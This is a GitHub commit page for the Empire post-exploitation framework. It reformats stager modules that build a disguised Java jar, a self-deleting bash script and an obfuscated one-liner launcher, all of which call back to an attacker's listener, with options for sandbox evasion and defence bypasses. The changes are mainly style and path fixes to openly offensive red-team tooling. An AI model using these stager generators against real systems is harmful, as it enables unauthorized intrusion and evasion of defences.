Skip to content

Commit

Permalink
Updated suggested values for stagers and reformatted code (#200)
Browse files Browse the repository at this point in the history 
* updated suggested values for stagers and reformatted code

* fixed directory issue for osx/jar stager

* fixed osx/jar code generation

* added default outfile value for macho stager

* fixed byte error in backdoorlnkmacro

* added suggested values to nim launcher
  • Loading branch information
@Cx01N
Cx01N authored Aug 14, 2021
1 parent 30dc318 commit 9fde11d
Show file tree
Hide file tree
Showing 36 changed files with 2,167 additions and 2,013 deletions.
23 changes: 10 additions & 13 deletions empire/server/common/stagers.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -505,11 +505,11 @@ def generate_pkg(self, launcher, bundleZip, AppName):
return package

def generate_jar(self, launcherCode):
file = open(self.mainMenu.installPath+'data/misc/Run.java','r')
file = open(self.mainMenu.installPath+'/data/misc/Run.java', 'r')
javacode = file.read()
file.close()
javacode = javacode.replace("LAUNCHER",launcherCode)
jarpath = self.mainMenu.installPath+'data/misc/classes/com/installer/apple/'
javacode = javacode.replace("LAUNCHER", launcherCode)
jarpath = self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/'
try:
os.makedirs(jarpath)
except OSError as e:
Expand All @@ -518,20 +518,17 @@ def generate_jar(self, launcherCode):
else:
pass

file = open(jarpath+'Run.java','w')
file = open(jarpath+'Run.java', 'w')
file.write(javacode)
file.close()
currdir = os.getcwd()
os.chdir(self.mainMenu.installPath+'data/misc/classes/')
os.system('javac com/installer/apple/Run.java')
os.system('jar -cfe '+self.mainMenu.installPath+'Run.jar com.installer.apple.Run com/installer/apple/Run.class')
os.chdir(currdir)
os.remove(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath+'data/misc/classes/com/installer/apple/Run.java')
jarfile = open('Run.jar','rb')
os.system('javac ' + self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.java')
os.system('jar -cfe ' + self.mainMenu.installPath + '/data/misc/Run.jar com.installer.apple.Run ' + self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.class')
os.remove(self.mainMenu.installPath + '/data/misc/classes/com/installer/apple/Run.java')
jarfile = open(self.mainMenu.installPath + '/data/misc/Run.jar', 'rb')
jar = jarfile.read()
jarfile.close()
os.remove('Run.jar')
os.remove(self.mainMenu.installPath + '/data/misc/Run.jar')

return jar

Expand Down
60 changes: 31 additions & 29 deletions empire/server/stagers/multi/bash.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -12,7 +12,7 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@harmj0y'],

'Description': ('Generates self-deleting Bash script to execute the Empire stage0 launcher.'),
'Description': 'Generates self-deleting Bash script to execute the Empire stage0 launcher.',

'Comments': [
''
Expand All @@ -23,32 +23,34 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'python'
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'python',
'SuggestedValues': ['python'],
'Strict': True
},
'OutFile' : {
'Description' : 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required' : False,
'Value' : ''
'OutFile': {
'Description': 'Filename that should be used for the generated output, otherwise returned as a string.',
'Required': False,
'Value': ''
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Bypasses': {
'Description': 'Bypasses as a space separated list to be prepended to the launcher',
Expand All @@ -71,14 +73,14 @@ def generate(self):

# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
safeChecks = self.options['SafeChecks']['Value']
listener_name = self.options['Listener']['Value']
user_agent = self.options['UserAgent']['Value']
safe_checks = self.options['SafeChecks']['Value']
bypasses = self.options['Bypasses']['Value']

# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True,
userAgent=userAgent, safeChecks=safeChecks,
launcher = self.mainMenu.stagers.generate_launcher(listener_name, language=language, encode=True,
userAgent=user_agent, safeChecks=safe_checks,
bypasses=bypasses)

if launcher == "":
Expand All @@ -87,7 +89,7 @@ def generate(self):

else:
script = "#!/bin/bash\n"
script += "%s\n" %(launcher)
script += "%s\n" % (launcher)
script += "rm -f \"$0\"\n"
script += "exit\n"
return script
125 changes: 64 additions & 61 deletions empire/server/stagers/multi/launcher.py
View file
Original file line number Diff line number Diff line change
Expand Up @@ -2,6 +2,7 @@
from builtins import object
from empire.server.common import helpers


class Stager(object):

def __init__(self, mainMenu, params=[]):
Expand All @@ -11,7 +12,7 @@ def __init__(self, mainMenu, params=[]):

'Author': ['@harmj0y'],

'Description': ('Generates a one-liner stage0 launcher for Empire.'),
'Description': 'Generates a one-liner stage0 launcher for Empire.',

'Comments': [
''
Expand All @@ -22,66 +23,68 @@ def __init__(self, mainMenu, params=[]):
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate stager for.',
'Required' : True,
'Value' : ''
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
'Language': {
'Description': 'Language of the stager to generate.',
'Required': True,
'Value': 'powershell',
'SuggestedValues': ['powershell', 'python'],
'Strict': True
},
'StagerRetries' : {
'Description' : 'Times for the stager to retry connecting.',
'Required' : False,
'Value' : '0'
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'OutFile': {
'Description': 'Filename that should be used for the generated output.',
'Required': False,
'Value': ''
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'Base64': {
'Description': 'Switch. Base64 encode the output.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate': {
'Description': 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required': False,
'Value': 'False',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'Obfuscate' : {
'Description' : 'Switch. Obfuscate the launcher powershell code, uses the ObfuscateCommand for obfuscation types. For powershell only.',
'Required' : False,
'Value' : 'False',
'SuggestedValues': ['True', 'False'],
'Strict' : True
'ObfuscateCommand': {
'Description': 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required': False,
'Value': r'Token\All\1'
},
'ObfuscateCommand' : {
'Description' : 'The Invoke-Obfuscation command to use. Only used if Obfuscate switch is True. For powershell only.',
'Required' : False,
'Value' : r'Token\All\1'
'SafeChecks': {
'Description': 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required': True,
'Value': 'True',
'SuggestedValues': ['True', 'False'],
'Strict': True
},
'SafeChecks' : {
'Description' : 'Switch. Checks for LittleSnitch or a SandBox, exit the staging process if true. Defaults to True.',
'Required' : True,
'Value' : 'True',
'SuggestedValues': ['True', 'False'],
'Strict' : True
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Bypasses': {
'Description': 'Bypasses as a space separated list to be prepended to the launcher',
Expand All @@ -100,33 +103,33 @@ def __init__(self, mainMenu, params=[]):
if option in self.options:
self.options[option]['Value'] = value


def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
listener_name = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
obfuscate = self.options['Obfuscate']['Value']
obfuscateCommand = self.options['ObfuscateCommand']['Value']
userAgent = self.options['UserAgent']['Value']
obfuscate_command = self.options['ObfuscateCommand']['Value']
user_agent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
safeChecks = self.options['SafeChecks']['Value']
proxy_creds = self.options['ProxyCreds']['Value']
stager_retries = self.options['StagerRetries']['Value']
safe_checks = self.options['SafeChecks']['Value']

encode = False
if base64.lower() == "true":
encode = True

invokeObfuscation = False
invoke_obfuscation = False
if obfuscate.lower() == "true":
invokeObfuscation = True
invoke_obfuscation = True

# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=encode,
obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand,
userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds,
stagerRetries=stagerRetries, safeChecks=safeChecks,
launcher = self.mainMenu.stagers.generate_launcher(listener_name, language=language, encode=encode,
obfuscate=invoke_obfuscation,
obfuscationCommand=obfuscate_command,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds,
stagerRetries=stager_retries, safeChecks=safe_checks,
bypasses=self.options['Bypasses']['Value'])

if launcher == "":
Expand Down
Loading

0 comments on commit 9fde11d

Please sign in to comment.